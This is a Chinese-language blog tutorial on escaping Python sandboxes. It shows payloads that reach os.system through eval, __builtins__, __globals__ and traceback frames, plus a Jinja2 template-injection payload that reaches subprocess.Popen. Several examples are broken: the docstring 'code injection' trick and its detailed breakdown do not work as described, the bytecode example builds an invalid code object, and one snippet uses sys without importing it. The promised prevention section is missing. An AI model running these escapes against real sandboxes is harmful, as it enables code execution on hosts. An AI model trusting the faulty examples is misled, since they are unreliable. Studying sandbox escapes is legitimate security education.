深入浅出 Python 沙箱越狱：原理、方法与防范

今天我们来聊一个有趣的话题 - Python 沙箱越狱。在我们开始之前，先来搞清楚什么是 Python 沙箱吧。

简单来，Python 沙箱就像是一个虚拟的"游乐场"。在这个游乐场里，你可以尽情地玩耍(运行 Python 代码)，但是不能伤害到外面的世界（不能访问系统资源或执行危险操作）。这个"游乐场"有围栏（限制），有规则（安全策略），目的就是让你玩得开心，又不会搞出什么大乱子。

除了在线编程平台，Python 沙箱在很多地方都有应用。比如在一些需要执行不受信任代码的场景中，如插件系统、科学计算环境等。总之，只要是需要在保证安全的前提下运行未知代码的地方，都可能会用到 Python 沙箱。

Python 沙箱的工作原理

现在我们知道了 Python 沙箱是什么，那它是怎么工作的呢？

首先，Python 解释器本身就有一些内置的安全特性。比如，它会阻止直接访问底层系统资源，限制某些危险操作的执行。但是，这些内置的安全机制还远远不够，因为 Python 的灵活性使得总能找到绕过这些限制的方法。

所以，我们需要更强大的沙箱。常见的 Python 沙箱的功能主要有以下几种：

1. 代码分析：在执行之前，对代码进行静态分析，检查是否包含危险操作。这就像是安检，在你进入游乐场之前，先检查你是否携带了危险物品。

2. 环境隔离：创建一个受限的 Python 环境，只允许访问安全的函数和模块。这就像是把游乐场里的某些区域封锁起来，你只能玩允许的项目。

3. 系统调用拦截：拦截并控制程序对操作系统的调用。这就像是在游乐场里安排了保安，监控每个人的行为。

4. 虚拟化：使用虚拟机或容器技术，在一个完全隔离的环境中运行代码。这就像是创建了一个虚拟的游乐场，无论你在里面做什么，都不会影响到真实世界。

Python 沙箱越狱的概念

说了这么多沙箱，现在终于要说到今天的主角 —— 沙箱越狱了！

所谓沙箱越狱，就是设法突破沙箱的限制，执行本不被允许的操作。就像是聪明的小朋友想方设法爬出游乐场的围栏，去外面的世界探险。

沙箱越狱可能带来严重的安全隐患。如果恶意用户成功越狱，他们可能会：

1. 访问或修改服务器上的敏感文件

2. 执行危险的系统命令

3. 发起网络攻击

4. 获取其他用户的私密信息

常见的 Python 沙箱越狱技术

1.利用内建函数

Python 有很多强大的内建函数，可能会成为沙箱越狱的工具。比如：

1. eval() 和 exec()：这两个函数可以执行字符串形式的 Python 代码。如果沙箱没有正确地限制这些函数，攻击者可能会利用它们执行任意代码。

2. import()：这个函数可以动态地导入模块。如果没有 proper 限制，攻击者可能会导入一些危险的模块。

例子:

# 利用eval()执行系统命令eval("__import__('os').system('ls')")

2. 利用模块导入

即使沙箱限制了直接导入模块，聪明的攻击者可能会找到间接导入的方法。比如：

• 利用__builtins__：Python 的内建命名空间中包含了很多有用的函数和类，包括__import__函数。

• 利用已导入模块的属性：有些看似无害的模块可能包含了可以用来导入其他模块的方法。

例子：

# 利用__builtins__导入os模块__builtins__.__import__('os').system('ls')

3. 利用代码注入

有时候，沙箱可能允许用户输入一些看似安全的代码片段，但攻击者可能会巧妙地构造这些代码片段，使其包含恶意代码。

例子：

# 假设沙箱允许定义函数def harmless_function():    # 看似无害的注释    """).__getattribute__.__globals__['__builtins__']['__import__']('os').system('ls')#"""    pass
# 利用exec执行注释中的代码exec(harmless_function.__doc__)

下面是对这个例子的详细剖析：

详细剖析

1. 函数定义：

def harmless_function():    # 看似无害的注释    """).__getattribute__.__globals__['__builtins__']['__import__']('os').system('ls')#"""    pass

• harmless_function 是一个普通的函数。

• 函数体内有一个多行字符串（文档字符串，或称 docstring），在 Python 中，文档字符串通常用于提供函数的描述。

• 这个文档字符串包含了一个看似注释的内容，实际却是一个恶意代码。

2. 恶意代码解析：

""").__getattribute__.__globals__['__builtins__']['__import__']('os').system('ls')#"""

• """)：这是一个字符串结束标记，它关闭了 docstring。

• .getattribute：获取对象的属性，在这里获取的是函数对象的属性。

• .globals：访问函数的全局命名空间。

• ['builtins']：访问全局命名空间中的内建模块。

• ['__import__']('os')：使用内建的__import__函数导入 os 模块。

• .system('ls')：调用 os 模块的 system 函数执行系统命令 ls，列出当前目录的文件。

4. 利用反射机制

Python 的反射机制允许程序在运行时检查、访问和修改自身的状态和行为。攻击者可能会利用这一特性来访问或修改本应受限的对象。

例子：

# 利用反射修改类的方法class Safe:    def __init__(self):        self.value = 42
safe = Safe()getattr(safe.__class__, '__init__').__globals__['__builtins__']['__import__']('os').system('ls')

5. 利用字节码操作

Python 代码在执行前会被编译成字节码。有些高级的攻击者可能会直接操作字节码来绕过沙箱的限制。

例子：

import types
def safe_function():    print("I'm safe!")
# 修改函数的字节码unsafe_code = types.CodeType(    0, 0, 0, 0, 0, 0,    bytes([0x64, 0x00, 0x00, 0x53]),  # 等同于 return __import__('os')    (), (), (), "", "", 0, b'')
safe_function.__code__ = unsafe_coderesult = safe_function()result.system('ls')

经典 Python 沙箱越狱案例分析

让我们来看两个真实的 Python 沙箱越狱案例，看看这些技术是如何在实际中运用的。

案例 1：PyPy 沙箱越狱

PyPy 是一个 Python 的替代实现，它也提供了一个沙箱模式。但在 2012 年，有研究者发现了一种巧妙的方法来逃逸这个沙箱。

技术原理：

1. PyPy 的沙箱阻止了对__builtin__模块的直接访问。

2. 但是，异常对象的__traceback__属性可以用来获取栈帧。

3. 通过栈帧，可以访问到全局命名空间，从而获取__builtin__。

示例代码：

try:    raise Exceptionexcept:    tb = sys.exc_info()[2]    frame = tb.tb_frame    frame.f_globals['__builtins__']['__import__']('os').system('ls')

案例 2：Jinja2 模板注入

Jinja2 是一个流行的 Python 模板引擎，它也提供了沙箱模式。但如果配置不当，仍然可能被攻击者利用。

技术原理：

1. Jinja2 的沙箱默认阻止了大多数危险操作。

2. 但是，某些看似无害的操作(如获取对象属性)是允许的。

3. 攻击者可以通过巧妙构造模板，一步步获取到可执行任意代码的能力。

示例代码：

{{''.__class__.__mro__[1].__subclasses__()[XXX]('ls', shell=True, stdout=-1)}}

这段代码通过获取字符串对象的类,然后获取其基类，最后找到可以执行系统命令的子类(通常是 subprocess.Popen)，从而执行系统命令。

总结

通过本文，我们了解了 Python 沙箱的概念、工作原理，以及各种沙箱越狱的技术。这些知识不仅能帮助我们更好地理解 Python 的安全机制，也能让我们在设计和实现安全系统时更加谨慎。

作者：大鲸鱼 crush

链接：https://juejin.cn/post/7383982728734425125